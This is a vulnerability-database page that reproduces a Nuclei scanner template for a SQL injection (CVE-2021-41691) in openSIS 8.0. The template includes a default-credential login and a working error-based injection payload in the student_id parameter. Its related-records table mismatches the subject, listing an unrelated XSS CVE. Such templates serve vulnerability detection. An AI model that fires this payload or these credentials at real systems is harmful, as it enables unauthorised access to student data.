Lucene search
openSIS Student Information System 8.0 SQL Injection
openSIS Student Information System 8.0 SQL Injection via student_id and TRANSFER[SCHOOL] parameter
Show more
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2021-41691 | 18 Nov 202321:50 | – | cve |
| CVE-2021-4169 | 26 Dec 202112:15 | – | cve |
 | Cross-site Scripting (XSS) - Reflected in livehelperchat/livehelperchat | 25 Dec 202103:10 | – | huntr |
 | Cross site scripting | 26 Dec 202112:15 | – | prion |
 | CVE-2021-4169 | 26 Dec 202112:15 | – | osv |
| BIT-livehelperchat-2021-4169 | 6 Mar 202410:58 | – | osv |
 | CVE-2021-4169 | 26 Dec 202112:15 | – | nvd |
 | CVE-2021-4169 Cross-site Scripting (XSS) - Reflected in livehelperchat/livehelperchat | 26 Dec 202111:35 | – | cvelist |
 | Unspecified vulnerability in livehelperchat | 28 Dec 202100:00 | – | cnvd |
id: CVE-2021-41691
info:
name: openSIS Student Information System 8.0 SQL Injection
author: Bartu Utku SARP
severity: high
description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: |
Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
reference:
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
- https://www.exploit-db.com/exploits/50637
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
classification:
cve-id: CVE-2021-41691
metadata:
max-request: 2
tags: cve,cve2021,sqli,auth,edb,opensis
variables:
num: "999999999"
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
- |
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
attack: pitchfork
payloads:
username:
- student
password:
- student@123
matchers:
- type: dsl
dsl:
- 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a00473045022100a9cd9674cd3097329efddf0844679b0398ccad6ea9ef11e29c96b29b4fc06690022057fded33d05f5b642f2558396246323ef8e2cd57615364deffdd351902645d69:922c64590222798bb761d5b6d8e72950Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo21 Mar 2022 13:46Current
6.2Medium risk
Vulners AI Score6.2
CVSS24.3
CVSS35.4 - 6.1
EPSS0.00576